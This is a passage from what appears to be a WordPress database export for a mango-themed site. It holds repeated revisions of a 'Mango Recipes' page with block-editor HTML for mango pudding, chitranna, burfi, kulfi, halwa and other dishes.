09:50:39','','images','','inherit','open','closed','','images-2','','','2022-02-08 15:20:39','2022-02-08 09:50:39','',745,'https://mangomitra.in/wp-content/uploads/2022/02/images.jfif',0,'attachment','image/jpeg',0),(870,1,'2022-02-08 15:21:22','2022-02-08 09:51:22','<!-- wp:group -->\n<div class=\"wp-block-group\"><!-- wp:columns -->\n<div class=\"wp-block-columns\"><!-- wp:column {\"width\":\"100%\"} -->\n<div class=\"wp-block-column\" style=\"flex-basis:100%\"><!-- wp:columns -->\n<div class=\"wp-block-columns\"><!-- wp:column {\"width\":\"100%\"} -->\n<div class=\"wp-block-column\" style=\"flex-basis:100%\"><!-- wp:columns -->\n<div class=\"wp-block-columns\"><!-- wp:column -->\n<div class=\"wp-block-column\"><!-- wp:heading -->\n<h2 id=\"mango-pudding-recipe\"><strong>MANGO PUDDING RECIPE</strong></h2>\n<!-- /wp:heading -->\n\n<!-- wp:image {\"id\":828,\"width\":236,\"height\":133,\"sizeSlug\":\"full\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-full is-resized\"><img src=\"https://mangomitra.in/wp-content/uploads/2022/02/252-2529007_pudding-jelly-hd-png-download-1.png\" alt=\"\" class=\"wp-image-828\" width=\"236\" height=\"133\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:paragraph -->\n<p>Preparation Time : 4 hours<br>Cook Time :15 minutes<br>Total Time : 4 hours 15 minutes<br>Servings : 3 Servings</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:heading {\"level\":5} -->\n<h5 id=\"ingredients\"><strong>INGREDIENTS</strong></h5>\n<!-- /wp:heading -->\n\n<!-- wp:paragraph -->\n<p>1 tsp agar-agar / gelatin / china grass<br>2 tsp hot water<br>2 cups mango puree<br>for cream layer:<br>1 cup milk full cream<br>1 tsp agar-agar / gelatin<br>½ cup sugar powdered<br>1 cup cream<br>1 tsp vanilla extract / vanilla essence<br>pinch of salt</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:heading {\"level\":5} -->\n<h5 id=\"instructions\"><strong>INSTRUCTIONS</strong></h5>\n<!-- /wp:heading -->\n\n<!-- wp:paragraph -->\n<p>Firstly, in a large mixing bowl take 1 tablespoon of agar-agar / gelatin and add 2 tablespoon hot water.   Mix well and dissolve agar-agar completely.<br>Further add 2 cups of mango puree. Mix well making sure the pulp gets mixed up with agar-agar uniformly.<br>Furthermore, place the serving glass in a bowl so that it gets tilted slightly. Pour in prepared mango mixture till it reaches the rim.<br>Now refrigerate it for 2 hours or overnight, till it sets completely. After 2 hours, make sure to check the mango has set completely.<br>Now prepare cream layer by heating up milk.<br>Add in 1 tablespoon agar-agar / gelatin and whisk well.<br>Cook the milk on medium-low heat till it steams (do not boil).<br>Further add 1 cup cream and whisk well. Additionally add ½ cup powdered sugar, 1 tablespoon vanilla extract and pinch of salt. Whisk and dissolve the sugar completely.<br>Let the milk cool for 10 minutes before pouring to the glass.<br>Pour the milk into glass.<br>Refrigerate it for 2 hours or overnight, till it sets completely.<br>Finally, garnish with few chopped mangoes and enjoy mango panna cotta or mango pudding.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:separator -->\n<hr class=\"wp-block-separator\"/>\n<!-- /wp:separator -->\n\n<!-- wp:columns -->\n<div class=\"wp-block-columns\"><!-- wp:column {\"width\":\"100%\"} -->\n<div class=\"wp-block-column\" style=\"flex-basis:100%\"><!-- wp:heading -->\n<h2 id=\"mavinakayi-chitranna-recipe\"><strong>MAVINAKAYI CHITRANNA RECIPE</strong></h2>\n<!-- /wp:heading -->\n\n<!-- wp:image {\"align\":\"center\",\"id\":860,\"width\":225,\"height\":141,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<div class=\"wp-block-image\"><figure class=\"aligncenter size-large is-resized\"><img src=\"https://mangomitra.in/wp-content/uploads/2022/02/IMG_5808-Copy-1-edited.jpg\" alt=\"\" class=\"wp-image-860\" width=\"225\" height=\"141\"/></figure></div>\n<!-- /wp:image -->\n\n<!-- wp:paragraph {\"align\":\"left\"} -->\n<p class=\"has-text-align-left\">Mavinakayi Chitranna Recipe is a delicious preparation of rice from the raw green mangoes that you get in the summers. The tartness of the mangoes along with the green chillies and the seasonings, brings out the flavors of this classic South Indian Rice recipe. While you’re probably enjoying the beautifully luscious ripe mangoes of the season, don’t forget to enjoy your share of the raw mangoes too by trying this Mavinakayi Chitranna Recipe. Summer feels incomplete without getting enough of the tangy hit of raw mangoes, balanced by hot spices,salt, lime and the right tempering, raw mangoes are delicious in a range of preparations.Serve the Mavinakayi Chitranna along with a Tomato Onion Cucumber Raita or High-Protein Peanut Chutney and a roasted papad for lunch or even for dinner. The Mavinakayi Chitranna makes a great picnic lunch too.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:separator -->\n<hr class=\"wp-block-separator\"/>\n<!-- /wp:separator -->\n\n<!-- wp:heading -->\n<h2 id=\"mango-rasayana\"><strong>MANGO RASAYANA</strong></h2>\n<!-- /wp:heading -->\n\n<!-- wp:image {\"align\":\"center\",\"id\":861,\"width\":166,\"height\":166,\"sizeSlug\":\"full\",\"linkDestination\":\"none\"} -->\n<div class=\"wp-block-image\"><figure class=\"aligncenter size-full is-resized\"><img src=\"https://mangomitra.in/wp-content/uploads/2022/02/Mango-Rasayana_finalforweb3-500x500-1.jpg\" alt=\"\" class=\"wp-image-861\" width=\"166\" height=\"166\"/></figure></div>\n<!-- /wp:image -->\n\n<!-- wp:paragraph -->\n<p id=\"mango-rasayana\">Cut the mangoes into small cubes and keep them in a mixing bowl.<br>Squeeze and extract the remaining mango juice from the mangoes.<br>Next add coconut milk, jaggery, and cardamom powder. Mix well. Adjust the consistency of rasayana.<br>Serve chilled with dosa, poori, or chapati.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:separator -->\n<hr class=\"wp-block-separator\"/>\n<!-- /wp:separator -->\n\n<!-- wp:heading -->\n<h2 id=\"mango-seekarna\"><strong>MANGO SEEKARNA</strong></h2>\n<!-- /wp:heading -->\n\n<!-- wp:image {\"align\":\"center\",\"id\":864,\"width\":213,\"height\":142,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<div class=\"wp-block-image\"><figure class=\"aligncenter size-large is-resized\"><img src=\"https://mangomitra.in/wp-content/uploads/2022/02/mangoseehikarne2-1024x682.jpg\" alt=\"\" class=\"wp-image-864\" width=\"213\" height=\"142\"/></figure></div>\n<!-- /wp:image -->\n\n<!-- wp:paragraph -->\n<p>Seekarane with Holige, Poori, Dosa, chapati, or also can be eaten as it is.<br>Any variety of mangoes can be used, but try to choose sweet, juicy, and pulpy mangoes.<br>You can use white or brown sugar instead of jaggery. Adjust the jaggery based on the sweetness of the mango. I have made coconut milk at home using freshly shredded coconut but you can also use store brought coconut milk. You can also replace coconut milk with dairy milk or almond milk.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:separator -->\n<hr class=\"wp-block-separator\"/>\n<!-- /wp:separator -->\n\n<!-- wp:heading -->\n<h2 id=\"mango-burfi-recipe\"><strong>MANGO BURFI RECIPE</strong></h2>\n<!-- /wp:heading -->\n\n<!-- wp:image {\"id\":865,\"width\":233,\"height\":233,\"sizeSlug\":\"full\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-full is-resized\"><img src=\"https://mangomitra.in/wp-content/uploads/2022/02/download.jfif\" alt=\"\" class=\"wp-image-865\" width=\"233\" height=\"233\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:paragraph -->\n<p>Preparation Time : 5 minutes<br>Cook Time : 15 minutes<br>Total Time : 20 minutes<br>Servings : 24 pieces</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:heading {\"level\":5} -->\n<h5 id=\"ingredients-1\"><strong>INGREDIENTS</strong></h5>\n<!-- /wp:heading -->\n\n<!-- wp:paragraph -->\n<p>1 cup mango cubes<br>½ cup milk<br>1 cup sugar<br>3 cup coconut grated<br>¼ tablespoon cardamom powder</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:heading {\"level\":5} -->\n<h5 id=\"instructons\"><strong>INSTRUCTONS</strong></h5>\n<!-- /wp:heading -->\n\n<!-- wp:paragraph -->\n<p>Firstly, in a blender take 1 cup mango and ½ cup milk.<br>Blend to smooth puree adding more milk if required.<br>Transfer the mango puree to large kadai.<br>Also add 1 cup sugar and mix until sugar dissolves completley.<br>Further add 3 cup coconut keep stirring till the mixture starts to thicken continue to cook on medium flame stirring continuously and after 15 minutes, coconut mixture will start to separate from pan.<br>Now add ¼ tablespoon cardamom powder and mix well.<br>Transfer the prepared mixture into a greased plate lined with baking paper set well forming a block and cut into pieces.<br>Finally, serve mango burfi / mango coconut barfi or store in airtight container for a week in the refrigerator.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:separator -->\n<hr class=\"wp-block-separator\"/>\n<!-- /wp:separator -->\n\n<!-- wp:heading -->\n<h2 id=\"mango-kulfi-recipe\"><strong>MANGO KULFI RECIPE</strong></h2>\n<!-- /wp:heading -->\n\n<!-- wp:image {\"align\":\"center\",\"id\":867,\"width\":157,\"height\":210,\"sizeSlug\":\"full\",\"linkDestination\":\"none\"} -->\n<div class=\"wp-block-image\"><figure class=\"aligncenter size-full is-resized\"><img src=\"https://mangomitra.in/wp-content/uploads/2022/02/download-1.jfif\" alt=\"\" class=\"wp-image-867\" width=\"157\" height=\"210\"/></figure></div>\n<!-- /wp:image -->\n\n<!-- wp:paragraph -->\n<p id=\"mango-kulfi-recipe\">Indian mango kulfi is a instant dessert that is made with condensed milk, mango pulp and cream.<br>For best results follow my detailed step-by-step photo instructions and tips.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:heading {\"level\":5} -->\n<h5 id=\"ingredients-2\"><strong>INGREDIENTS</strong></h5>\n<!-- /wp:heading -->\n\n<!-- wp:paragraph -->\n<p>1 ½ cup mango pieces, cubed (use sweet mango)(1 medium)<br>½ tin sweetened condensed milk(milkmaid)<br>200 ml whipping cream or 250 ml cream(chilled)<br>1/4 tablespoon elaichi (cardamom powder)<br>1 pinch kesar (saffron) (optional for color)</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:heading {\"level\":5} -->\n<h5 id=\"instructions-1\"><strong>INSTRUCTIONS</strong></h5>\n<!-- /wp:heading -->\n\n<!-- wp:paragraph -->\n<p>Soak kesar or saffron in 2 tablespoon hot water. This is optional.<br>Wash and peel mango. Chop them to cubes and add to a blender jar.<br>Add chilled cream, saffron, condensed milk and cardamom powder to the jar.<br>Blend on a medium speed until smooth.<br>Add chopped pistas. Give a good stir.<br>Pour the mixture to the kulfi moulds and refrigerate until set.<br>Rub the moulds in between your palm or dip them in a bowl of water.<br>Gently loosen and remove mango kulfi.<br>Garnish with crushed pista. Serve with love.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:separator -->\n<hr class=\"wp-block-separator\"/>\n<!-- /wp:separator -->\n\n<!-- wp:heading -->\n<h2 id=\"mango-halwa-recipe\"><strong>MANGO HALWA RECIPE</strong></h2>\n<!-- /wp:heading -->\n\n<!-- wp:image {\"id\":869,\"sizeSlug\":\"full\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-full\"><img src=\"https://mangomitra.in/wp-content/uploads/2022/02/images.jfif\" alt=\"\" class=\"wp-image-869\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:paragraph -->\n<p>Preparation Time :15 Mins<br>Cook Time :45 Mints<br>Makes :4-5 Perfect Squares &amp; Some Small Pieces</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:heading {\"level\":5} -->\n<h5 id=\"ingredients-2\"><strong>INGREDIENTS</strong></h5>\n<!-- /wp:heading -->\n\n<!-- wp:paragraph -->\n<p>2 and 3/4 cups Mango Pulp<br>1 tablespoon Ghee</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:heading {\"level\":5} -->\n<h5 id=\"instructions-1\"><strong>INSTRUCTIONS</strong></h5>\n<!-- /wp:heading -->\n\n<!-- wp:paragraph -->\n<p>In a heavy bottom vessel add the ghee and when it is hot add the mango pulp.<br>Keep stirring the mixture every 10-15 minutes so that it does not stick to the vessel.<br>The mixture will reduce in quantity, there will be a change in color and after 45 minutes transfer this mixture to a greased (with very little ghee) plate. I used 2 and 3/4 cups of pulp and it cooked down to 3/4ths of a cup approximately. So a very small plate is enough.<br>Left the plate undisturbed for one more hour and then cut it into pieces.<br>Garnish it with nuts of your choice.</p>\n<!-- /wp:paragraph --></div>\n<!-- /wp:column --></div>\n<!-- /wp:columns --></div>\n<!-- /wp:column --></div>\n<!-- /wp:columns --></div>\n<!-- /wp:column --></div>\n<!-- /wp:columns --></div>\n<!-- /wp:column --></div>\n<!-- /wp:columns --></div>\n<!-- /wp:group -->\n\n<!-- wp:paragraph -->\n<p></p>\n<!-- /wp:paragraph -->\n\n<!-- wp:separator -->\n<hr class=\"wp-block-separator\"/>\n<!-- /wp:separator -->','Mango Recipes','','inherit','closed','closed','','745-revision-v1','','','2022-02-08 15:21:22','2022-02-08 09:51:22','',745,'https://mangomitra.in/?p=870',0,'revision','',0),(872,1,'2022-02-08 15:23:33','2022-02-08 09:53:33','<!-- wp:group -->\n<div class=\"wp-block-group\"><!-- wp:columns -->\n<div class=\"wp-block-columns\"><!-- wp:column {\"width\":\"100%\"} -->\n<div class=\"wp-block-column\" style=\"flex-basis:100%\"><!-- wp:columns -->\n<div class=\"wp-block-columns\"><!-- wp:column {\"width\":\"100%\"} -->\n<div class=\"wp-block-column\" style=\"flex-basis:100%\"><!-- wp:columns -->\n<div class=\"wp-block-columns\"><!-- wp:column -->\n<div class=\"wp-block-column\"><!-- wp:heading -->\n<h2 id=\"mango-pudding-recipe\"><strong>MANGO PUDDING RECIPE</strong></h2>\n<!-- /wp:heading -->\n\n<!-- wp:image {\"id\":828,\"width\":236,\"height\":133,\"sizeSlug\":\"full\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-full is-resized\"><img src=\"https://mangomitra.in/wp-content/uploads/2022/02/252-2529007_pudding-jelly-hd-png-download-1.png\" alt=\"\" class=\"wp-image-828\" width=\"236\" height=\"133\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:paragraph -->\n<p>Preparation Time : 4 hours<br>Cook Time :15 minutes<br>Total Time : 4 hours 15 minutes<br>Servings : 3 Servings</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:heading {\"level\":5} -->\n<h5 id=\"ingredients\"><strong>INGREDIENTS</strong></h5>\n<!-- /wp:heading -->\n\n<!-- wp:paragraph -->\n<p>1 tsp agar-agar / gelatin / china grass<br>2 tsp hot water<br>2 cups mango puree<br>for cream layer:<br>1 cup milk full cream<br>1 tsp agar-agar / gelatin<br>½ cup sugar powdered<br>1 cup cream<br>1 tsp vanilla extract / vanilla essence<br>pinch of salt</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:heading {\"level\":5} -->\n<h5 id=\"instructions\"><strong>INSTRUCTIONS</strong></h5>\n<!-- /wp:heading -->\n\n<!-- wp:paragraph -->\n<p>Firstly, in a large mixing bowl take 1 tablespoon of agar-agar / gelatin and add 2 tablespoon hot water.   Mix well and dissolve agar-agar completely.<br>Further add 2 cups of mango puree. Mix well making sure the pulp gets mixed up with agar-agar uniformly.<br>Furthermore, place the serving glass in a bowl so that it gets tilted slightly. Pour in prepared mango mixture till it reaches the rim.<br>Now refrigerate it for 2 hours or overnight, till it sets completely. After 2 hours, make sure to check the mango has set completely.<br>Now prepare cream layer by heating up milk.<br>Add in 1 tablespoon agar-agar / gelatin and whisk well.<br>Cook the milk on medium-low heat till it steams (do not boil).<br>Further add 1 cup cream and whisk well. Additionally add ½ cup powdered sugar, 1 tablespoon vanilla extract and pinch of salt. Whisk and dissolve the sugar completely.<br>Let the milk cool for 10 minutes before pouring to the glass.<br>Pour the milk into glass.<br>Refrigerate it for 2 hours or overnight, till it sets completely.<br>Finally, garnish with few chopped mangoes and enjoy mango panna cotta or mango pudding.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:separator -->\n<hr class=\"wp-block-separator\"/>\n<!-- /wp:separator -->\n\n<!-- wp:columns -->\n<div class=\"wp-block-columns\"><!-- wp:column {\"width\":\"100%\"} -->\n<div class=\"wp-block-column\" style=\"flex-basis:100%\"><!-- wp:heading -->\n<h2 id=\"mavinakayi-chitranna-recipe\"><strong>MAVINAKAYI CHITRANNA RECIPE</strong></h2>\n<!-- /wp:heading -->\n\n<!-- wp:image {\"align\":\"center\",\"id\":860,\"width\":225,\"height\":141,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<div class=\"wp-block-image\"><figure class=\"aligncenter size-large is-resized\"><img src=\"https://mangomitra.in/wp-content/uploads/2022/02/IMG_5808-Copy-1-edited.jpg\" alt=\"\" class=\"wp-image-860\" width=\"225\" height=\"141\"/></figure></div>\n<!-- /wp:image -->\n\n<!-- wp:paragraph {\"align\":\"left\"} -->\n<p class=\"has-text-align-left\">Mavinakayi Chitranna Recipe is a delicious preparation of rice from the raw green mangoes that you get in the summers. The tartness of the mangoes along with the green chillies and the seasonings, brings out the flavors of this classic South Indian Rice recipe. While you’re probably enjoying the beautifully luscious ripe mangoes of the season, don’t forget to enjoy your share of the raw mangoes too by trying this Mavinakayi Chitranna Recipe. Summer feels incomplete without getting enough of the tangy hit of raw mangoes, balanced by hot spices,salt, lime and the right tempering, raw mangoes are delicious in a range of preparations.Serve the Mavinakayi Chitranna along with a Tomato Onion Cucumber Raita or High-Protein Peanut Chutney and a roasted papad for lunch or even for dinner. The Mavinakayi Chitranna makes a great picnic lunch too.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:separator -->\n<hr class=\"wp-block-separator\"/>\n<!-- /wp:separator -->\n\n<!-- wp:heading -->\n<h2 id=\"mango-rasayana\"><strong>MANGO RASAYANA</strong></h2>\n<!-- /wp:heading -->\n\n<!-- wp:image {\"align\":\"center\",\"id\":861,\"width\":166,\"height\":166,\"sizeSlug\":\"full\",\"linkDestination\":\"none\"} -->\n<div class=\"wp-block-image\"><figure class=\"aligncenter size-full is-resized\"><img src=\"https://mangomitra.in/wp-content/uploads/2022/02/Mango-Rasayana_finalforweb3-500x500-1.jpg\" alt=\"\" class=\"wp-image-861\" width=\"166\" height=\"166\"/></figure></div>\n<!-- /wp:image -->\n\n<!-- wp:paragraph -->\n<p id=\"mango-rasayana\">Cut the mangoes into small cubes and keep them in a mixing bowl.<br>Squeeze and extract the remaining mango juice from the mangoes.<br>Next add coconut milk, jaggery, and cardamom powder. Mix well. Adjust the consistency of rasayana.<br>Serve chilled with dosa, poori, or chapati.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:separator -->\n<hr class=\"wp-block-separator\"/>\n<!-- /wp:separator -->\n\n<!-- wp:heading -->\n<h2 id=\"mango-seekarna\"><strong>MANGO SEEKARNA</strong></h2>\n<!-- /wp:heading -->\n\n<!-- wp:image {\"align\":\"center\",\"id\":864,\"width\":213,\"height\":142,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<div class=\"wp-block-image\"><figure class=\"aligncenter size-large is-resized\"><img src=\"https://mangomitra.in/wp-content/uploads/2022/02/mangoseehikarne2-1024x682.jpg\" alt=\"\" class=\"wp-image-864\" width=\"213\" height=\"142\"/></figure></div>\n<!-- /wp:image -->\n\n<!-- wp:paragraph -->\n<p>Seekarane with Holige, Poori, Dosa, chapati, or also can be eaten as it is.<br>Any variety of mangoes can be used, but try to choose sweet, juicy, and pulpy mangoes.<br>You can use white or brown sugar instead of jaggery. Adjust the jaggery based on the sweetness of the mango. I have made coconut milk at home using freshly shredded coconut but you can also use store brought coconut milk. You can also replace coconut milk with dairy milk or almond milk.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:separator -->\n<hr class=\"wp-block-separator\"/>\n<!-- /wp:separator -->\n\n<!-- wp:heading -->\n<h2 id=\"mango-burfi-recipe\"><strong>MANGO BURFI RECIPE</strong></h2>\n<!-- /wp:heading -->\n\n<!-- wp:image {\"id\":865,\"width\":233,\"height\":233,\"sizeSlug\":\"full\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-full is-resized\"><img src=\"https://mangomitra.in/wp-content/uploads/2022/02/download.jfif\" alt=\"\" class=\"wp-image-865\" width=\"233\" height=\"233\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:paragraph -->\n<p>Preparation Time : 5 minutes<br>Cook Time : 15 minutes<br>Total Time : 20 minutes<br>Servings : 24 pieces</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:heading {\"level\":5} -->\n<h5 id=\"ingredients-1\"><strong>INGREDIENTS</strong></h5>\n<!-- /wp:heading -->\n\n<!-- wp:paragraph -->\n<p>1 cup mango cubes<br>½ cup milk<br>1 cup sugar<br>3 cup coconut grated<br>¼ tablespoon cardamom powder</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:heading {\"level\":5} -->\n<h5 id=\"instructons\"><strong>INSTRUCTONS</strong></h5>\n<!-- /wp:heading -->\n\n<!-- wp:paragraph -->\n<p>Firstly, in a blender take 1 cup mango and ½ cup milk.<br>Blend to smooth puree adding more milk if required.<br>Transfer the mango puree to large kadai.<br>Also add 1 cup sugar and mix until sugar dissolves completley.<br>Further add 3 cup coconut keep stirring till the mixture starts to thicken continue to cook on medium flame stirring continuously and after 15 minutes, coconut mixture will start to separate from pan.<br>Now add ¼ tablespoon cardamom powder and mix well.<br>Transfer the prepared mixture into a greased plate lined with baking paper set well forming a block and cut into pieces.<br>Finally, serve mango burfi / mango coconut barfi or store in airtight container for a week in the refrigerator.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:separator -->\n<hr class=\"wp-block-separator\"/>\n<!-- /wp:separator -->\n\n<!-- wp:heading -->\n<h2 id=\"mango-kulfi-recipe\"><strong>MANGO KULFI RECIPE</strong></h2>\n<!-- /wp:heading -->\n\n<!-- wp:image {\"align\":\"left\",\"id\":867,\"width\":132,\"height\":177,\"sizeSlug\":\"full\",\"linkDestination\":\"none\"} -->\n<div class=\"wp-block-image\"><figure class=\"alignleft size-full is-resized\"><img src=\"https://mangomitra.in/wp-content/uploads/2022/02/download-1.jfif\" alt=\"\" class=\"wp-image-867\" width=\"132\" height=\"177\"/></figure></div>\n<!-- /wp:image -->\n\n<!-- wp:paragraph -->\n<p></p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p></p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p></p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p></p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p></p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Indian mango kulfi is a instant dessert that is made with condensed milk, mango pulp and cream.<br>For best results follow my detailed step-by-step photo instructions and tips.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:heading {\"level\":5} -->\n<h5 id=\"ingredients-2\"><strong>INGREDIENTS</strong></h5>\n<!-- /wp:heading -->\n\n<!-- wp:paragraph -->\n<p>1 ½ cup mango pieces, cubed (use sweet mango)(1 medium)<br>½ tin sweetened condensed milk(milkmaid)<br>200 ml whipping cream or 250 ml cream(chilled)<br>1/4 tablespoon elaichi (cardamom powder)<br>1 pinch kesar (saffron) (optional for color)</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:heading {\"level\":5} -->\n<h5 id=\"instructions-1\"><strong>INSTRUCTIONS</strong></h5>\n<!-- /wp:heading -->\n\n<!-- wp:paragraph -->\n<p>Soak kesar or saffron in 2 tablespoon hot water. This is optional.<br>Wash and peel mango. Chop them to cubes and add to a blender jar.<br>Add chilled cream, saffron, condensed milk and cardamom powder to the jar.<br>Blend on a medium speed until smooth.<br>Add chopped pistas. Give a good stir.<br>Pour the mixture to the kulfi moulds and refrigerate until set.<br>Rub the moulds in between your palm or dip them in a bowl of water.<br>Gently loosen and remove mango kulfi.<br>Garnish with crushed pista. Serve with love.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:separator -->\n<hr class=\"wp-block-separator\"/>\n<!-- /wp:separator -->\n\n<!-- wp:heading -->\n<h2 id=\"mango-halwa-recipe\"><strong>MANGO HALWA RECIPE</strong></h2>\n<!-- /wp:heading -->\n\n<!-- wp:image {\"id\":869,\"sizeSlug\":\"full\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-full\"><img src=\"https://mangomitra.in/wp-content/uploads/2022/02/images.jfif\" alt=\"\" class=\"wp-image-869\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:paragraph -->\n<p>Preparation Time :15 Mins<br>Cook Time :45 Mints<br>Makes :4-5 Perfect Squares &amp; Some Small Pieces</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:heading {\"level\":5} -->\n<h5 id=\"ingredients-2\"><strong>INGREDIENTS</strong></h5>\n<!-- /wp:heading -->\n\n<!-- wp:paragraph -->\n<p>2 and 3/4 cups Mango Pulp<br>1 tablespoon Ghee</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:heading {\"level\":5} -->\n<h5 id=\"instructions-1\"><strong>INSTRUCTIONS</strong></h5>\n<!-- /wp:heading -->\n\n<!-- wp:paragraph -->\n<p>In a heavy bottom vessel add the ghee and when it is hot add the mango pulp.<br>Keep stirring the mixture every 10-15 minutes so that it does not stick to the vessel.<br>The mixture will reduce in quantity, there will be a change in color and after 45 minutes transfer this mixture to a greased (with very little ghee) plate. I used 2 and 3/4 cups of pulp and it cooked down to 3/4ths of a cup approximately. So a very small plate is enough.<br>Left the plate undisturbed for one more hour and then cut it into pieces.<br>Garnish it with nuts of your choice.</p>\n<!-- /wp:paragraph --></div>\n<!-- /wp:column --></div>\n<!-- /wp:columns --></div>\n<!-- /wp:column --></div>\n<!-- /wp:columns --></div>\n<!-- /wp:column --></div>\n<!-- /wp:columns --></div>\n<!-- /wp:column --></div>\n<!-- /wp:columns --></div>\n<!-- /wp:group -->\n\n<!-- wp:paragraph -->\n<p></p>\n<!-- /wp:paragraph -->\n\n<!-- wp:separator -->\n<hr class=\"wp-block-separator\"/>\n<!-- /wp:separator -->','Mango Recipes','','inherit','closed','closed','','745-revision-v1','','','2022-02-08 15:23:33','2022-02-08 09:53:33','',745,'https://mangomitra.in/?p=872',0,'revision','',0),(874,1,'2022-02-08 15:28:12','2022-02-08 09:58:12','<!-- wp:group -->\n<div class=\"wp-block-group\"><!-- wp:columns -->\n<div class=\"wp-block-columns\"><!-- wp:column {\"width\":\"100%\"} -->\n<div class=\"wp-block-column\" style=\"flex-basis:100%\"><!-- wp:columns -->\n<div class=\"wp-block-columns\"><!-- wp:column {\"width\":\"100%\"} -->\n<div class=\"wp-block-column\" style=\"flex-basis:100%\"><!-- wp:columns -->\n<div class=\"wp-block-columns\"><!-- wp:column -->\n<div class=\"wp-block-column\"><!-- wp:heading -->\n<h2 id=\"mango-pudding-recipe\"><strong>MANGO PUDDING RECIPE</strong></h2>\n<!-- /wp:heading -->\n\n<!-- wp:image {\"id\":828,\"width\":236,\"height\":133,\"sizeSlug\":\"full\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-full is-resized\"><img src=\"https://mangomitra.in/wp-content/uploads/2022/02/252-2529007_pudding-jelly-hd-png-download-1.png\" alt=\"\" class=\"wp-image-828\" width=\"236\" height=\"133\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:paragraph -->\n<p>Preparation Time : 4 hours<br>Cook Time :15 minutes<br>Total Time : 4 hours 15 minutes<br>Servings : 3 Servings</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:heading {\"level\":5} -->\n<h5 id=\"ingredients\"><strong>INGREDIENTS</strong></h5>\n<!-- /wp:heading -->\n\n<!-- wp:paragraph -->\n<p>1 tsp agar-agar / gelatin / china grass<br>2 tsp hot water<br>2 cups mango puree<br>for cream layer:<br>1 cup milk full cream<br>1 tsp agar-agar / gelatin<br>½ cup sugar powdered<br>1 cup cream<br>1 tsp vanilla extract / vanilla essence<br>pinch of salt</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:heading {\"level\":5} -->\n<h5 id=\"instructions\"><strong>INSTRUCTIONS</strong></h5>\n<!-- /wp:heading -->\n\n<!-- wp:paragraph -->\n<p>Firstly, in a large mixing bowl take 1 tablespoon of agar-agar / gelatin and add 2 tablespoon hot water.   Mix well and dissolve agar-agar completely.<br>Further add 2 cups of mango puree. Mix well making sure the pulp gets mixed up with agar-agar uniformly.<br>Furthermore, place the serving glass in a bowl so that it gets tilted slightly. Pour in prepared mango mixture till it reaches the rim.<br>Now refrigerate it for 2 hours or overnight, till it sets completely. After 2 hours, make sure to check the mango has set completely.<br>Now prepare cream layer by heating up milk.<br>Add in 1 tablespoon agar-agar / gelatin and whisk well.<br>Cook the milk on medium-low heat till it steams (do not boil).<br>Further add 1 cup cream and whisk well. Additionally add ½ cup powdered sugar, 1 tablespoon vanilla extract and pinch of salt. Whisk and dissolve the sugar completely.<br>Let the milk cool for 10 minutes before pouring to the glass.<br>Pour the milk into glass.<br>Refrigerate it for 2 hours or overnight, till it sets completely.<br>Finally, garnish with few chopped mangoes and enjoy mango panna cotta or mango pudding.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:separator -->\n<hr class=\"wp-block-separator\"/>\n<!-- /wp:separator -->\n\n<!-- wp:columns -->\n<div class=\"wp-block-columns\"><!-- wp:column {\"width\":\"100%\"} -->\n<div class=\"wp-block-column\" style=\"flex-basis:100%\"><!-- wp:heading -->\n<h2 id=\"mavinakayi-chitranna-recipe\"><strong>MAVINAKAYI CHITRANNA RECIPE</strong></h2>\n<!-- /wp:heading -->\n\n<!-- wp:image {\"align\":\"left\",\"id\":860,\"width\":225,\"height\":141,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} 